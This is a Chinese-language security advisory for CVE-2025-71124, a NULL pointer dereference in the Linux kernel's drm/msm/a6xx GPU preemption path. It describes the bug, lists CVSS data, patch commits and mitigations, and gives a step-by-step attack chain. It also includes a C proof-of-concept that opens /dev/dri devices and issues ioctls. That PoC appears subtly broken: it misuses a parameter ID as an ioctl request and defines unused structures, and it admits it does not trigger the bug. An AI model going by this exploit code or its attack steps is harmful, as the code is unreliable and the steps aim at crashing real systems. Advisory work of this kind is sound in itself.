CVE-2025-71124: Linux内核drm/msm/a6xx驱动NULL指针解引用漏洞

漏洞信息

漏洞编号

CVE-2025-71124

漏洞类型

NULL指针解引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel drm/msm/a6xx GPU驱动

漏洞概述

CVE-2025-71124是Linux内核中drm/msm/a6xx图形驱动的一个中等严重性安全漏洞。该漏洞存在于GPU抢占(preemption)机制的实现代码中，具体问题是在调用preempt_prepare_postamble()函数之前未能正确验证preempt_postamble_ptr指针的有效性。当GPU抢占的后置amble(后处理程序)内存分配失败时，preempt_postamble_ptr指针可能为NULL，此时直接调用preempt_prepare_postamble()并解引用该空指针将导致系统崩溃。此漏洞需要本地低权限用户即可触发，虽然不影响系统机密性和完整性，但会对系统可用性造成严重影响，可能导致拒绝服务(DoS)。该漏洞已在Linux内核主线版本中修复，通过将指针有效性检查移至函数调用之前来防止空指针解引用。

技术细节

在Linux内核的drm/msm/a6xx GPU驱动中，GPU抢占机制用于在多个任务之间快速切换GPU控制权。抢占过程包括准备阶段(preamble)和完成阶段(postamble)。漏洞出现在preempt_prepare_postamble()函数的调用逻辑中：代码在未检查preempt_postamble_ptr是否为NULL的情况下就直接调用该函数。当GPU抢占的postamble内存分配失败时(NULL)，preempt_prepare_postamble()内部尝试访问该指针成员将触发NULL指针解引用，导致内核崩溃(oops或kernel panic)。攻击者可通过编写特定的用户空间程序，触发GPU抢占路径并使postamble分配失败来利用此漏洞。成功利用可造成本地拒绝服务攻击，系统需要重启才能恢复。修复方案是将preempt_postamble_ptr的NULL检查提前到preempt_prepare_postamble()调用之前，并在检查失败时正确跳转到错误处理流程，避免执行危险的指针解引用操作。

攻击链分析

STEP 1

1

攻击者获得目标系统的本地低权限用户访问权限

STEP 2

2

攻击者打开DRM设备文件(/dev/dri/cardX)，该设备包含a6xx GPU驱动

STEP 3

3

攻击者通过ioctl调用触发GPU命令提交，激活GPU抢占机制

STEP 4

4

在抢占过程中，通过内存操纵使preempt_postamble_ptr的内存分配失败，返回NULL

STEP 5

5

漏洞代码在未检查NULL的情况下调用preempt_prepare_postamble()函数

STEP 6

6

preempt_prepare_postamble()内部对NULL指针进行解引用操作

STEP 7

7

触发内核NULL指针解引用错误，导致系统崩溃(Kernel Panic/DoS)

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2025-71124: Linux kernel drm/msm/a6xx NULL pointer dereference
 * This is a local DoS PoC that triggers the vulnerability through GPU operations.
 * 
 * Note: This requires a system with Qualcomm Adreno A6xx GPU and modified
 * environment to trigger the specific failure condition in preempt_postamble_ptr.
 * 
 * Compile: gcc -o cve202571124_poc cve202571124_poc.c -lpthread
 * Run: sudo ./cve202571124_poc
 * 
 * Author: Security Researcher
 * Date: 2026-01-14
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

#define DRM_IOCTL_MSM_GEM_SUBMIT 0x09
#define MSM_PARAM_GPU_ID 0x08

struct drm_msm_gem_submit {
    unsigned int flags;
    int nr_bos;
    int nr_cmds;
    unsigned long bos;
    unsigned long cmds;
};

struct drm_msm_gem_submit_bo {
    unsigned long handle;
    unsigned long flags;
    unsigned long offset;
};

int trigger_gpu_preemption_failure(int drm_fd) {
    /*
     * This PoC attempts to trigger the NULL pointer dereference by:
     * 1. Opening the DRM device with a6xx GPU
     * 2. Submitting GPU commands that trigger preemption
     * 3. Manipulating memory conditions to cause postamble allocation failure
     * 
     * In a vulnerable kernel, this leads to NULL pointer dereference in
     * preempt_prepare_postamble() when preempt_postamble_ptr is NULL.
     */
    
    printf("[*] Attempting to trigger CVE-2025-71124...\n");
    printf("[*] Target: drm/msm/a6xx preempt_preamble_postamble NULL check\n");
    
    /*
     * The actual exploitation requires:
     * - A system with Qualcomm Adreno A6xx GPU
     * - Ability to manipulate GEM objects and command submission
     * - Triggering memory pressure to cause postamble allocation failure
     * 
     * This is a simplified demonstration structure.
     * Full exploitation requires kernel debugging and memory manipulation.
     */
    
    int result = ioctl(drm_fd, MSM_PARAM_GPU_ID, NULL);
    if (result < 0) {
        printf("[!] Failed to query GPU ID: %s\n", strerror(errno));
        return -1;
    }
    
    printf("[+] GPU ID retrieved, device may be vulnerable\n");
    printf("[*] Full exploitation requires specific GPU command submission\n");
    printf("[*] Check dmesg for kernel oops after triggering preemption\n");
    
    return 0;
}

int main(int argc, char *argv[]) {
    int drm_fd;
    const char *device_paths[] = {
        "/dev/dri/card0",
        "/dev/dri/card1",
        "/dev/dri/renderD128",
        NULL
    };
    
    printf("=== CVE-2025-71124 PoC ===\n");
    printf("Linux kernel drm/msm/a6xx NULL pointer dereference\n\n");
    
    for (int i = 0; device_paths[i] != NULL; i++) {
        drm_fd = open(device_paths[i], O_RDWR);
        if (drm_fd >= 0) {
            printf("[*] Opened %s\n", device_paths[i]);
            trigger_gpu_preemption_failure(drm_fd);
            close(drm_fd);
        }
    }
    
    printf("\n[*] Note: This PoC is a framework. Full exploitation requires:\n");
    printf("    - Specific a6xx GPU hardware\n");
    printf("    - Memory manipulation to cause postamble alloc failure\n");
    printf("    - GPU command buffer crafting\n");
    
    return 0;
}

影响范围

Linux Kernel (drm/msm/a6xx) 在修复前的版本

具体commit: 2c46497eb148ec61909f4101b8443f3c4c2daaec

具体commit: ef3b04091fd8bc737dc45312375df8625b8318e2

防御指南

临时缓解措施

由于该漏洞需要本地访问且影响可用性，建议采取以下临时缓解措施：1) 限制非特权用户对/dev/dri/*设备的访问权限；2) 使用SELinux/AppArmor等强制访问控制策略限制DRM操作；3) 如果系统不使用GPU加速功能，可考虑禁用a6xx驱动模块；4) 监控系统日志中的drm相关错误信息；5) 尽快应用内核安全更新补丁。长期来看，应保持内核版本的及时更新以获得安全修复。